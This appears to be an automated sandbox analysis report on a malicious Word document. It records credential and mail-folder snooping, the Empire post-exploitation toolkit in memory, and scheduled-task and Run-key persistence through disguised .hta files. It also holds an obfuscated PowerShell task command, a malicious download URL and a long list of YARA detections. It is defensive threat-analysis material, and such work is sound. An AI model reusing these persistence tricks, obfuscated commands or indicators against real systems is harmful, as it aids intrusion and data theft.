Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Searches for Windows Mail specific files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown	Jump to behavior

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 1343

Remote Access Functionality:

Found post-exploitation toolkit Empire

Show sources

Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	Memory string: function Invoke-Empire {t
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	Memory string: Invoke-Empiret
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	Memory string: function Invoke-Empire {

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
10:00:00	API Interceptor	4x Sleep call for process: taskeng.exe modified
10:00:14	Task Scheduler	Run new task: JavaUpdateTaskCore path: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
13:44:24	API Interceptor	3x Sleep call for process: WINWORD.EXE modified
13:44:39	API Interceptor	223x Sleep call for process: powershell.exe modified
13:44:48	API Interceptor	5x Sleep call for process: certutil.exe modified
13:44:55	API Interceptor	5x Sleep call for process: mshta.exe modified
13:44:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SilwerlightUpdateCoreRun C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta
13:45:44	API Interceptor	3x Sleep call for process: WerFault.exe modified
13:45:45	API Interceptor	1x Sleep call for process: DWWIN.EXE modified
13:45:51	API Interceptor	8x Sleep call for process: schtasks.exe modified
13:45:58	Task Scheduler	Run new task: AdobeUpdateTaskDailyCore path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe s>-c "& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)"

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Spiez CONVERGENCE.doc	53%	virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
mysent.org	7%	virustotal	Browse
dgdadq.dm.files.1drv.com	0%	virustotal	Browse
api.onedrive.com	0%	virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://mysent.org/access.log.txt	3%	virustotal		Browse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source	Rule	Description	Author
dropped\580A98AB00459B6800754CE6A4E140AE0	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y2YPC48Z\access.log[1].txt	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\580A98AB00459B6800754CE6A4E140AE	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R03ZXFR8\access.log[1].txt	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.16470021362.05457000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000001.00000002.16471643789.05D66000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000001.00000002.16479129493.07B20000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000000.16251752367.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000000.16251811007.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000000.16251871858.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000000.16251952862.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000002.16511624641.000C0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000002.16511858528.004E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000002.16511656893.000E8000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000002.16511692083.000FE000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000002.00000003.16252061690.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000000.16252582166.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000000.16252700862.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000000.16252640147.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000000.16252495561.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.16516367054.00240000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000003.16252867730.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000000.16252991335.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000000.16253360353.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000000.16253534240.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.16254060832.00280000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.16254080364.002A7000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000002.16254122513.00410000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000003.16253657832.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.16253760975.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.16253931601.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.16254018589.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.16254142755.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000005.00000000.16253457890.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.16517606816.002E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.16517720716.00370000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.16518717374.01280000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.16518634850.01260000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.16518183828.005A0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.16516412332.00350000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.16516456299.0038D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000004.00000002.16516425523.00377000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000003.16254299738.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000003.16257125734.00386000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000003.16257155189.00355000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000003.16257356049.0035A000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000003.16257308570.0032B000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000000.16266903266.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000003.16257262767.00310000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000000.16269518741.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000000.16269739444.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000000.16269838618.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16278676993.000B0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.16517628488.00307000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16278810878.00114000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16280469364.007F0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16280477576.00800000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16278760458.000F7000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16280487798.00810000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16278724742.000D0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000003.16270011304.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16280536226.0158D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000008.00000002.16289167708.00123000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.16313509174.004C4000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.16313596373.00504000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.16313702173.00534000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000002.16313610905.0050D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16297070594.0053A000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16298019408.005CA000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16298064731.005CB000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16298398000.0052D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16298407717.00530000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16298971996.004D1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16299132829.0052D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16299341957.00530000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16300255520.0052D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16300263613.00530000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16300337195.004C3000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16300979933.0052D000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16300788955.00530000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000007.00000002.16281065527.01F78000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16302598190.00504000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16303926726.00504000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16304261000.005B8000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16304546872.005BA000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16304603512.005BD000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16305887929.005C0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000009.00000003.16296997137.0052F000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000000.16296484704.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000000.16296593702.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000000.16296702253.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000000.16296808424.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000002.16525541083.00150000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000002.16525844730.003F8000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000003.16296929519.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000003.16298971392.003E1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000003.16298807624.003FC000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000003.16298689577.003F1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000000.16297805127.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000000.16298307990.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000000.16298524959.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000000.16298084982.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000002.16525795636.003E1000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000002.16530163707.00396000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000002.16530128762.00370000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000002.16525712693.003B0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000A.00000002.16525762372.003D7000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000002.16530199944.003A5000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000002.16530262653.005E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000C.00000003.16298709914.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000000.16298887951.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000000.16299447192.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000000.16300196558.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000000.16300331558.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000002.16300827017.00080000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000002.16301298263.002E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000002.16301400720.00306000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000D.00000003.16300533489.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000E.00000002.16532104215.01210000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000E.00000002.16532260705.01300000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000E.00000002.16532283238.01307000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000000E.00000002.16538668028.044ED000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000013.00000000.16423513415.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000013.00000000.16423696288.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000013.00000000.16424010643.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000013.00000000.16424296226.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000013.00000002.16425519548.002F0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000013.00000002.16425863355.005E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000013.00000003.16424469175.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000000.16427157568.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000000.16427626069.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000000.16427801984.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000000.16427909144.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000002.16428253744.00086000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000002.16428237813.00060000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000002.16428345115.002F0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000014.00000003.16428100823.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000015.00000000.16435013085.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000015.00000000.16435224699.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000015.00000000.16434819215.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000015.00000000.16435443949.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000015.00000003.16435713321.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000016.00000002.16550395399.00260000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000016.00000002.16550953531.00530000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000017.00000002.16557924955.01C50000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000016.00000003.16441425216.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000016.00000000.16440999829.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000018.00000000.16453096494.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000018.00000000.16453674876.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000018.00000000.16453891780.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000018.00000002.16455102821.000E0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000018.00000002.16455015171.000B0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000018.00000003.16454255633.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000018.00000000.16453553931.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000000.16458141609.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000000.16458311882.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000000.16458528912.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000000.16458843270.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000002.16459856147.00160000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000002.16459880486.00186000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000002.16459967558.003A0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001A.00000003.16459226751.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000000.16460451553.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
0000001B.00000000.16460674878.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
